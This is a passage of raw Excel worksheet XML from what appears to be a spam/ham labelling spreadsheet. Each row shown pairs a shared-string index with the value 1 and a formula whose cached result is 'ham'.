      <c r="A1396" t="s">
        <v>1010</v>
      </c>
      <c r="B1396">
        <v>1</v>
      </c>
      <c r="C1396" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1397" t="s">
        <v>1011</v>
      </c>
      <c r="B1397">
        <v>1</v>
      </c>
      <c r="C1397" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1398" t="s">
        <v>970</v>
      </c>
      <c r="B1398">
        <v>1</v>
      </c>
      <c r="C1398" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1399" t="s">
        <v>1012</v>
      </c>
      <c r="B1399">
        <v>1</v>
      </c>
      <c r="C1399" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1400" t="s">
        <v>21</v>
      </c>
      <c r="B1400">
        <v>1</v>
      </c>
      <c r="C1400" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1401" t="s">
        <v>1013</v>
      </c>
      <c r="B1401">
        <v>1</v>
      </c>
      <c r="C1401" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1402" t="s">
        <v>1014</v>
      </c>
      <c r="B1402">
        <v>1</v>
      </c>
      <c r="C1402" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1403" t="s">
        <v>1015</v>
      </c>
      <c r="B1403">
        <v>1</v>
      </c>
      <c r="C1403" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1404" t="s">
        <v>1016</v>
      </c>
      <c r="B1404">
        <v>1</v>
      </c>
      <c r="C1404" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1405" t="s">
        <v>21</v>
      </c>
      <c r="B1405">
        <v>1</v>
      </c>
      <c r="C1405" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1406" t="s">
        <v>21</v>
      </c>
      <c r="B1406">
        <v>1</v>
      </c>
      <c r="C1406" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1407" t="s">
        <v>1017</v>
      </c>
      <c r="B1407">
        <v>1</v>
      </c>
      <c r="C1407" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1408" t="s">
        <v>1018</v>
      </c>
      <c r="B1408">
        <v>1</v>
      </c>
      <c r="C1408" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1409" t="s">
        <v>1019</v>
      </c>
      <c r="B1409">
        <v>1</v>
      </c>
      <c r="C1409" t="str">
        <f t="shared" si="21"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1410" t="s">
        <v>1020</v>
      </c>
      <c r="B1410">
        <v>1</v>
      </c>
      <c r="C1410" t="str">
        <f t="shared" ref="C1410:C1473" si="22">IF(B1410="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1411" t="s">
        <v>1021</v>
      </c>
      <c r="B1411">
        <v>1</v>
      </c>
      <c r="C1411" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1412" t="s">
        <v>1022</v>
      </c>
      <c r="B1412">
        <v>1</v>
      </c>
      <c r="C1412" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1413" t="s">
        <v>1023</v>
      </c>
      <c r="B1413">
        <v>1</v>
      </c>
      <c r="C1413" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1414" t="s">
        <v>1024</v>
      </c>
      <c r="B1414">
        <v>1</v>
      </c>
      <c r="C1414" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1415" t="s">
        <v>1025</v>
      </c>
      <c r="B1415">
        <v>1</v>
      </c>
      <c r="C1415" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1416" t="s">
        <v>1026</v>
      </c>
      <c r="B1416">
        <v>1</v>
      </c>
      <c r="C1416" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1417" t="s">
        <v>1027</v>
      </c>
      <c r="B1417">
        <v>1</v>
      </c>
      <c r="C1417" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1418" t="s">
        <v>1028</v>
      </c>
      <c r="B1418">
        <v>1</v>
      </c>
      <c r="C1418" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1419" t="s">
        <v>1029</v>
      </c>
      <c r="B1419">
        <v>1</v>
      </c>
      <c r="C1419" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1420" t="s">
        <v>1030</v>
      </c>
      <c r="B1420">
        <v>1</v>
      </c>
      <c r="C1420" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1421" t="s">
        <v>1031</v>
      </c>
      <c r="B1421">
        <v>1</v>
      </c>
      <c r="C1421" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1422" t="s">
        <v>1032</v>
      </c>
      <c r="B1422">
        <v>1</v>
      </c>
      <c r="C1422" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1423" t="s">
        <v>1033</v>
      </c>
      <c r="B1423">
        <v>1</v>
      </c>
      <c r="C1423" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1424" t="s">
        <v>1034</v>
      </c>
      <c r="B1424">
        <v>1</v>
      </c>
      <c r="C1424" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1425" t="s">
        <v>1035</v>
      </c>
      <c r="B1425">
        <v>1</v>
      </c>
      <c r="C1425" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1426" t="s">
        <v>1036</v>
      </c>
      <c r="B1426">
        <v>1</v>
      </c>
      <c r="C1426" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1427" t="s">
        <v>1037</v>
      </c>
      <c r="B1427">
        <v>1</v>
      </c>
      <c r="C1427" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1428" t="s">
        <v>1038</v>
      </c>
      <c r="B1428">
        <v>1</v>
      </c>
      <c r="C1428" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1429" t="s">
        <v>1039</v>
      </c>
      <c r="B1429">
        <v>1</v>
      </c>
      <c r="C1429" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1430" t="s">
        <v>1040</v>
      </c>
      <c r="B1430">
        <v>1</v>
      </c>
      <c r="C1430" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1431" t="s">
        <v>1041</v>
      </c>
      <c r="B1431">
        <v>1</v>
      </c>
      <c r="C1431" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1432" t="s">
        <v>1042</v>
      </c>
      <c r="B1432">
        <v>1</v>
      </c>
      <c r="C1432" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1433" t="s">
        <v>1043</v>
      </c>
      <c r="B1433">
        <v>1</v>
      </c>
      <c r="C1433" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1434" t="s">
        <v>1043</v>
      </c>
      <c r="B1434">
        <v>1</v>
      </c>
      <c r="C1434" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1435" t="s">
        <v>1044</v>
      </c>
      <c r="B1435">
        <v>1</v>
      </c>
      <c r="C1435" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1436" t="s">
        <v>1045</v>
      </c>
      <c r="B1436">
        <v>1</v>
      </c>
      <c r="C1436" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1437" t="s">
        <v>1046</v>
      </c>
      <c r="B1437">
        <v>1</v>
      </c>
      <c r="C1437" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1438" t="s">
        <v>21</v>
      </c>
      <c r="B1438">
        <v>1</v>
      </c>
      <c r="C1438" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1439" t="s">
        <v>21</v>
      </c>
      <c r="B1439">
        <v>1</v>
      </c>
      <c r="C1439" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1440" t="s">
        <v>928</v>
      </c>
      <c r="B1440">
        <v>1</v>
      </c>
      <c r="C1440" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1441" t="s">
        <v>928</v>
      </c>
      <c r="B1441">
        <v>1</v>
      </c>
      <c r="C1441" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1442" t="s">
        <v>928</v>
      </c>
      <c r="B1442">
        <v>1</v>
      </c>
      <c r="C1442" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1443" t="s">
        <v>1047</v>
      </c>
      <c r="B1443">
        <v>1</v>
      </c>
      <c r="C1443" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1444" t="s">
        <v>1048</v>
      </c>
      <c r="B1444">
        <v>1</v>
      </c>
      <c r="C1444" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1445" t="s">
        <v>1049</v>
      </c>
      <c r="B1445">
        <v>1</v>
      </c>
      <c r="C1445" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1446" t="s">
        <v>21</v>
      </c>
      <c r="B1446">
        <v>1</v>
      </c>
      <c r="C1446" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1447" t="s">
        <v>21</v>
      </c>
      <c r="B1447">
        <v>1</v>
      </c>
      <c r="C1447" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1448" t="s">
        <v>21</v>
      </c>
      <c r="B1448">
        <v>1</v>
      </c>
      <c r="C1448" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1449" t="s">
        <v>1050</v>
      </c>
      <c r="B1449">
        <v>1</v>
      </c>
      <c r="C1449" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1450" t="s">
        <v>1050</v>
      </c>
      <c r="B1450">
        <v>1</v>
      </c>
      <c r="C1450" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1451" t="s">
        <v>1051</v>
      </c>
      <c r="B1451">
        <v>1</v>
      </c>
      <c r="C1451" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1452" t="s">
        <v>928</v>
      </c>
      <c r="B1452">
        <v>1</v>
      </c>
      <c r="C1452" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1453" t="s">
        <v>1052</v>
      </c>
      <c r="B1453">
        <v>1</v>
      </c>
      <c r="C1453" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1454" t="s">
        <v>1053</v>
      </c>
      <c r="B1454">
        <v>1</v>
      </c>
      <c r="C1454" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1455" t="s">
        <v>1054</v>
      </c>
      <c r="B1455">
        <v>1</v>
      </c>
      <c r="C1455" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1456" t="s">
        <v>1055</v>
      </c>
      <c r="B1456">
        <v>1</v>
      </c>
      <c r="C1456" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1457" t="s">
        <v>1056</v>
      </c>
      <c r="B1457">
        <v>1</v>
      </c>
      <c r="C1457" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1458" t="s">
        <v>1057</v>
      </c>
      <c r="B1458">
        <v>1</v>
      </c>
      <c r="C1458" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1459" t="s">
        <v>1058</v>
      </c>
      <c r="B1459">
        <v>1</v>
      </c>
      <c r="C1459" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1460" t="s">
        <v>1059</v>
      </c>
      <c r="B1460">
        <v>1</v>
      </c>
      <c r="C1460" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1461" t="s">
        <v>1060</v>
      </c>
      <c r="B1461">
        <v>1</v>
      </c>
      <c r="C1461" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1462" t="s">
        <v>1060</v>
      </c>
      <c r="B1462">
        <v>1</v>
      </c>
      <c r="C1462" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1463" t="s">
        <v>1061</v>
      </c>
      <c r="B1463">
        <v>1</v>
      </c>
      <c r="C1463" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1464" t="s">
        <v>1038</v>
      </c>
      <c r="B1464">
        <v>1</v>
      </c>
      <c r="C1464" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1465" t="s">
        <v>21</v>
      </c>
      <c r="B1465">
        <v>1</v>
      </c>
      <c r="C1465" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1466" t="s">
        <v>1062</v>
      </c>
      <c r="B1466">
        <v>1</v>
      </c>
      <c r="C1466" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1467" t="s">
        <v>1063</v>
      </c>
      <c r="B1467">
        <v>1</v>
      </c>
      <c r="C1467" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1468" t="s">
        <v>21</v>
      </c>
      <c r="B1468">
        <v>1</v>
      </c>
      <c r="C1468" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1469" t="s">
        <v>1064</v>
      </c>
      <c r="B1469">
        <v>1</v>
      </c>
      <c r="C1469" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1470" t="s">
        <v>1065</v>
      </c>
      <c r="B1470">
        <v>1</v>
      </c>
      <c r="C1470" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1471" t="s">
        <v>1066</v>
      </c>
      <c r="B1471">
        <v>1</v>
      </c>
      <c r="C1471" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1472" t="s">
        <v>21</v>
      </c>
      <c r="B1472">
        <v>1</v>
      </c>
      <c r="C1472" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1473" t="s">
        <v>1067</v>
      </c>
      <c r="B1473">
        <v>1</v>
      </c>
      <c r="C1473" t="str">
        <f t="shared" si="22"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1474" t="s">
        <v>21</v>
      </c>
      <c r="B1474">
        <v>1</v>
      </c>
      <c r="C1474" t="str">
        <f t="shared" ref="C1474:C1537" si="23">IF(B1474="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1475" t="s">
        <v>1068</v>
      </c>
      <c r="B1475">
        <v>1</v>
      </c>
      <c r="C1475" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1476" t="s">
        <v>1068</v>
      </c>
      <c r="B1476">
        <v>1</v>
      </c>
      <c r="C1476" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1477" t="s">
        <v>1069</v>
      </c>
      <c r="B1477">
        <v>1</v>
      </c>
      <c r="C1477" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1478" t="s">
        <v>1070</v>
      </c>
      <c r="B1478">
        <v>1</v>
      </c>
      <c r="C1478" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1479" t="s">
        <v>21</v>
      </c>
      <c r="B1479">
        <v>1</v>
      </c>
      <c r="C1479" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1480" t="s">
        <v>21</v>
      </c>
      <c r="B1480">
        <v>1</v>
      </c>
      <c r="C1480" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1481" t="s">
        <v>21</v>
      </c>
      <c r="B1481">
        <v>1</v>
      </c>
      <c r="C1481" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1482" t="s">
        <v>1071</v>
      </c>
      <c r="B1482">
        <v>1</v>
      </c>
      <c r="C1482" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1483" t="s">
        <v>1072</v>
      </c>
      <c r="B1483">
        <v>1</v>
      </c>
      <c r="C1483" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1484" t="s">
        <v>1055</v>
      </c>
      <c r="B1484">
        <v>1</v>
      </c>
      <c r="C1484" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1485" t="s">
        <v>1055</v>
      </c>
      <c r="B1485">
        <v>1</v>
      </c>
      <c r="C1485" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1486" t="s">
        <v>1073</v>
      </c>
      <c r="B1486">
        <v>1</v>
      </c>
      <c r="C1486" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1487" t="s">
        <v>1074</v>
      </c>
      <c r="B1487">
        <v>1</v>
      </c>
      <c r="C1487" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1488" t="s">
        <v>1075</v>
      </c>
      <c r="B1488">
        <v>1</v>
      </c>
      <c r="C1488" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1489" t="s">
        <v>1076</v>
      </c>
      <c r="B1489">
        <v>1</v>
      </c>
      <c r="C1489" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1490" t="s">
        <v>1077</v>
      </c>
      <c r="B1490">
        <v>1</v>
      </c>
      <c r="C1490" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1491" t="s">
        <v>1078</v>
      </c>
      <c r="B1491">
        <v>1</v>
      </c>
      <c r="C1491" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1492" t="s">
        <v>1079</v>
      </c>
      <c r="B1492">
        <v>1</v>
      </c>
      <c r="C1492" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1493" t="s">
        <v>1080</v>
      </c>
      <c r="B1493">
        <v>1</v>
      </c>
      <c r="C1493" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1494" t="s">
        <v>791</v>
      </c>
      <c r="B1494">
        <v>1</v>
      </c>
      <c r="C1494" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1495" t="s">
        <v>1081</v>
      </c>
      <c r="B1495">
        <v>1</v>
      </c>
      <c r="C1495" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1496" t="s">
        <v>1064</v>
      </c>
      <c r="B1496">
        <v>1</v>
      </c>
      <c r="C1496" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1497" t="s">
        <v>1082</v>
      </c>
      <c r="B1497">
        <v>1</v>
      </c>
      <c r="C1497" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1498" t="s">
        <v>1083</v>
      </c>
      <c r="B1498">
        <v>1</v>
      </c>
      <c r="C1498" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1499" t="s">
        <v>1084</v>
      </c>
      <c r="B1499">
        <v>1</v>
      </c>
      <c r="C1499" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1500" t="s">
        <v>1085</v>
      </c>
      <c r="B1500">
        <v>1</v>
      </c>
      <c r="C1500" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1501" t="s">
        <v>1086</v>
      </c>
      <c r="B1501">
        <v>1</v>
      </c>
      <c r="C1501" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1502" t="s">
        <v>1087</v>
      </c>
      <c r="B1502">
        <v>1</v>
      </c>
      <c r="C1502" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1503" t="s">
        <v>1088</v>
      </c>
      <c r="B1503">
        <v>1</v>
      </c>
      <c r="C1503" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1504" t="s">
        <v>21</v>
      </c>
      <c r="B1504">
        <v>1</v>
      </c>
      <c r="C1504" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1505" t="s">
        <v>1089</v>
      </c>
      <c r="B1505">
        <v>1</v>
      </c>
      <c r="C1505" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1506" t="s">
        <v>1090</v>
      </c>
      <c r="B1506">
        <v>1</v>
      </c>
      <c r="C1506" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1507" t="s">
        <v>1091</v>
      </c>
      <c r="B1507">
        <v>1</v>
      </c>
      <c r="C1507" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1508" t="s">
        <v>1092</v>
      </c>
      <c r="B1508">
        <v>1</v>
      </c>
      <c r="C1508" t="str">
